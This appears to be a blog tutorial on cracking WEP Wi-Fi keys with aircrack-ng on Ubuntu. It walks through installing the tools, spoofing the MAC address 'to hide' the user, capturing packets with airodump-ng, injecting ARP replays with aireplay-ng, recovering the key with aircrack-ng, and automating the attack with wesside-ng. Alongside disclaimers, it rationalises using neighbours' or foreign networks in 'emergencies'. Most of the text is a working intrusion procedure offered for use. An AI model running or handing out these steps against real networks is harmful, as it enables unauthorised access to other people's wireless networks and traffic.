*Warning: This guide is for educational purposes only, do not crack your neighbor’s or anyone’s wifi as it’s illegal to do so in the U.S. Please check with your country’s local law for those of you outside the U.S. and use common sense when hacking WEP.
Yesterday I had the pleasure of cracking my very first WEP. Of course, it was my own wireless connection I hacked but I found it to be invaluable skill to learn just in case I go traveling around the world one day and find myself without a wireless connection, let’s say somewhere in Thailand for example, I might need to hack WEP for emergency purposes.
Cracking WEP is “highly” illegal (if you crack someone else’s wifi that it) in the U.S. and I don’t advise you to do that but learn the skills of cracking WEP for emergencies.
For example, if there was an earthquake one day and your home got destroyed in the process (where it left you stuck in your basement), it might then be okay to use your neighbor’s wifi so you can use Twitter and alert your family and friends that you are stuck inside your home’s basement. (This actually happened in recent Chile earthquake where a family member used Twitter as communication.)
There’s a ton of times where knowing how to cracking WEP can come in handy under emergency circumstances, especially if you are traveling in another country.
Anyways, there’s a linux live CD distro you can download called BackTrack that comes with a bunch of tools to crack WEP keys but in my testing I found that BackTrack was actually lacking in driver support than my regular ol’ Ubuntu Linux. I think it’s better to use your own Linux (such as Ubuntu) and just install aircrack, which is easy with apt-get or yum for other distros.
So, today I will show you how to do it with Ubuntu. For those of you haven’t yet, you can go and make your own persistent Ubuntu linux USB flash drive first.
1. First, you will need to uncomment any repositories being commented out under /etc/apt/sources.list.
Next type, “sudo apt-get update”.
Next type, “sudo apt-get install aircrack-ng”.
Next type, “sudo apt-get install macchanger”.
*If macchanger doesn’t install the first time, try apt-get update and try again.
Next type, “sudo apt-get update”.
Next type again, “sudo apt-get install macchanger”.
2. Make sure to turn off your wifi connection now by doing right click on your connections icon at the top right of the screen and uncheck “disable Wireless”.
3. Next type “ifconfig” and/or “iwconfig” to find out your WiFi card’s linux handle such as eth0, wlan0, or ath0.
Once you find out what that is and make note of that.
Mine was “wlan0” as shown here:
*Replace any wlan0 in the following steps with your wifi’s such as eth0, eth1, ath0, wlan0, or whatever.
4. Next type “sudo airmon-ng stop wlan0”.
Next type “ifconfig wlan0 down”.
Next type, “sudo macchanger –mac 00:11:22:33:44:55 wlan0”. This will change your MAC address of your WiFi card to 00:11:22:33:44:55 temporarily so it will be easy to refer to. (and also will hide your MAC address just in case)
Next type, “sudo airmon-ng start wlan0”.
Here’s a screenshot of what I did:
5. Next type, “sudo airodump-ng wlan0”.
You will probably see bunch of wireless hotspots around where you are. Here, you can choose your own WiFi router for testing. Note the MAC address and the channel of your WiFi router shown here.
6. Next type, “sudo airodump-ng -c 10 -w testing –bssid 00:23:FG:23:45:43 wlan0” where 10 is the channel number you noted in the step before and 00:23:FG:23:45:43 is the MAC address. (yes, please replace them!!!) (and “testing” is the filename to store, it can be anything)
You should get a window like below, make sure to keep watching the #Data section, that’s how many packets you are able to capture to deciphering later.
Open up a new window and type, “sudo aireplay-ng -1 0 -a 00:23:FG:23:45:43 -h 00:11:22:33:44:55 wlan0” where 00:23:FG:23:45:43 should be replaced (again) with the your own WiFi router’s.
*Note: If you get a message saying that you’re on the wrong channel, keep doing the command until you get through.
7. Wait until the above process completes then open up another new windows and type,
“sudo aireplay-ng -3 -b 00:23:FG:23:45:43 -h 00:11:22:33:44:55 wlan0” and change “00:23:FG:23:45:43” to your WiFi router’s.
8. Next, open up another new window and type:
sudo aircrack-ng -b 00:23:FG:23:45:43 testing-01.cap where 00:23:FG:23:45:43 is your WiFi router’s Mac and testing is the filename you choose in previous step 6.
You should see that aircrack is starting to crack your WiFi router now, if it doesn’t, just wait as aircrack will keep trying to crack every 5000 packets.
Here’s what it looks like while you are cracking WEP:
You should be able to crack your own WiFi’s WEP with about 15,000 or 30,000 packets. It all depends on how much activity is going on within your own WiFi router. If someone is downloading a huge YouTube video, it’s going to be faster than on a wifi network that’s not being used at all (in which case it might take a whole day).
When it cracks the WEP, you will get a screenshot like below:
How to Automate WEP Hacking using Wesside-NG!
You can also try the automated WEP hacking, it will basically do all the commands Step 4.
sudo wesside-ng -i wlan0
If you get Max Retransmits messages, try:
sudo wesside-ng -i wlan0 -k 1
Also, if you want to hack wep on a specific SSID do:
sudo wesside-ng -i wlan0 -v XX:XX:XX:XX:XX:XX
(where XX:XX:XX:XX:XX:XX is the SSID MAC)
Remember, it’s illegal to crack WEP (in most countries) and I highly advise you to only test it on your own WiFi for educational purposes!
If your Ubuntu’s live USB flash doesn’t support your wireless adaptor (you can’t connect to the internet), you will probably have to get that working first. Also, not all wireless adaptors are supported by aircrack, I used Intel WiFi Pro 2200 and Intel WiFi 4965 with success. I think most Intel/Atheros will work fine but most Broadcoms might not. If it doesn’t work, just get a USB wireless adaptor for this test.
WiFi Robin – If you are not good at linux or this is confusing to you, check out the WiFi Robin, a standalone WEP cracking device.